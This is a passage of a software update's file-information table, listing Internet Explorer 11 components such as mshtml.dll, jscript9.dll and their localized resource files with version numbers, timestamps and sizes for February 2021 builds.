13-Feb-2021| 12:00| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Resources.dll| 11.0.9600.19963| 12-Feb-2021| 18:54| 10,948,096 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 2,048 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:17| 1,207,808 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 696,320 \nmsfeeds.mof| Not versioned| 12-Feb-2021| 16:34| 1,518 \nmsfeedsbs.mof| Not versioned| 12-Feb-2021| 16:34| 1,574 \nmsfeedsbs.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 52,736 \nmsfeedssync.exe| 11.0.9600.19963| 12-Feb-2021| 18:48| 11,776 \nhtml.iec| 2019.0.0.19963| 12-Feb-2021| 18:46| 341,504 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtmlmedia.dll| 11.0.9600.19963| 12-Feb-2021| 18:11| 1,155,584 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 18:58| 20,296,192 \nmshtml.tlb| 11.0.9600.19963| 12-Feb-2021| 18:59| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 12-Feb-2021| 16:23| 3,228 \nieetwcollector.exe| 11.0.9600.19963| 12-Feb-2021| 18:37| 104,960 \nieetwproxystub.dll| 11.0.9600.19963| 12-Feb-2021| 18:46| 47,616 \nieetwcollectorres.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 4,096 \nielowutil.exe| 11.0.9600.19963| 12-Feb-2021| 18:39| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.19963| 12-Feb-2021| 17:51| 290,304 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2018| 6:39| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2018| 6:39| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2018| 6:39| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2018| 6:39| 11,340 \nbing.ico| Not versioned| 23-Sep-2018| 6:33| 5,430 \nieUnatt.exe| 11.0.9600.19963| 12-Feb-2021| 18:37| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Feb-2021| 13:19| 2,956 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 18:35| 1,399,296 \nMshtmlDac.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 64,000 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:18| 1,075,200 \noccache.dll| 11.0.9600.19963| 12-Feb-2021| 18:18| 130,048 \ndesktop.ini| Not versioned| 23-Sep-2018| 6:26| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \ndesktop.ini| Not versioned| 23-Sep-2018| 6:27| 65 \nmsrating.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2018| 6:27| 8,798 \nticrf.rat| Not versioned| 23-Sep-2018| 6:27| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 2,308,096 \nsqmapi.dll| 6.2.9200.16384| 13-Feb-2021| 11:46| 228,232 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:11| 692,224 \niernonce.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 30,720 \niesetup.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 62,464 \nieuinit.inf| Not versioned| 12-Feb-2021| 17:30| 16,303 \ninseng.dll| 11.0.9600.19963| 12-Feb-2021| 18:24| 91,136 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:23| 154,112 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 124,928 \nTimeline.cpu.xml| Not versioned| 23-Sep-2018| 6:26| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 2,066,432 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,121,216 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:48| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 2,075,136 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 2,063,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 2,314,240 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 2,390,528 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 2,033,152 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:52| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,255,872 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 2,061,312 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 2,326,016 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 2,019,840 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 2,071,040 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 2,082,816 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,307,584 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 2,170,368 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 2,153,984 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 2,291,712 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 2,283,520 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 2,052,096 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,301,952 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 2,093,056 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 2,075,648 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 2,299,392 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 2,094,592 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,316,800 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 2,305,536 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 2,277,888 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 3,584 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 2,060,288 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 2,315,776 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,278,912 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 2,324,992 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 2,098,176 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 3,072 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:16| 1,890,304 \nieui.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 3,072 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:09| 13,881,856 \nieui.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 476,160 \nieframe.ptxml| Not versioned| 12-Feb-2021| 16:23| 24,486 \nieinstal.exe| 11.0.9600.19963| 12-Feb-2021| 18:20| 475,648 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:47| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:48| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:49| 526,294 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:50| 499,654 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:51| 552,337 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:51| 944,559 \nInetRes.adml| Not versioned| 13-Feb-2021| 13:20| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:52| 543,946 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:53| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:54| 526,557 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:55| 575,838 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:56| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:57| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:57| 570,737 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:58| 548,119 \nInetRes.adml| Not versioned| 13-Feb-2021| 11:59| 639,271 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:00| 525,504 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:01| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:02| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:03| 488,488 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:04| 548,494 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:04| 559,343 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:05| 535,067 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:06| 541,455 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:06| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:07| 804,470 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:08| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:09| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:10| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:11| 503,909 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:11| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:12| 521,583 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:13| 457,561 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:14| 420,082 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:15| 436,651 \nInetRes.adml| Not versioned| 13-Feb-2021| 12:16| 436,651 \ninetres.admx| Not versioned| 11-Jan-2021| 19:25| 1,678,023 \nMsSpellCheckingFacility.exe| 6.3.9600.19963| 12-Feb-2021| 18:32| 668,672 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:47| 29,184 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:49| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:50| 35,328 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:51| 37,888 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:20| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:53| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:54| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:55| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:56| 27,648 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:57| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:58| 33,792 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 11:59| 23,040 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:00| 22,016 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:01| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:02| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 31,232 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:03| 34,304 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:04| 35,840 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:05| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:06| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:07| 34,816 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:08| 33,280 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:09| 32,256 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:10| 32,768 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:11| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:12| 30,720 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:13| 29,696 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:14| 16,384 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 16,896 \njscript9.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:15| 16,896 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 4,112,384 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:37| 653,824 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:47| 498,176 \n \n### \n\n__\n\nInternet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 1,569,280 \niexplore.exe| 11.0.9600.19963| 13-Feb-2021| 12:45| 810,376 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 31,744 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 39,424 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 32,768 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 37,376 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 38,400 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 30,720 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 35,328 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 36,864 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 25,600 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 24,576 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 36,352 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 35,840 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 34,816 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 33,280 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 34,304 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 20,992 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 21,504 \nwebcheck.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 21,504 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 46,592 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 56,320 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 57,856 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 49,664 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 47,616 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 49,152 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 55,296 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 45,056 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 39,424 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 35,840 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 53,760 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 54,272 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 51,200 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 53,248 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 51,712 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 50,688 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 50,176 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 30,720 \nwininet.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 30,720 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:26| 2,132,992 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 10,752 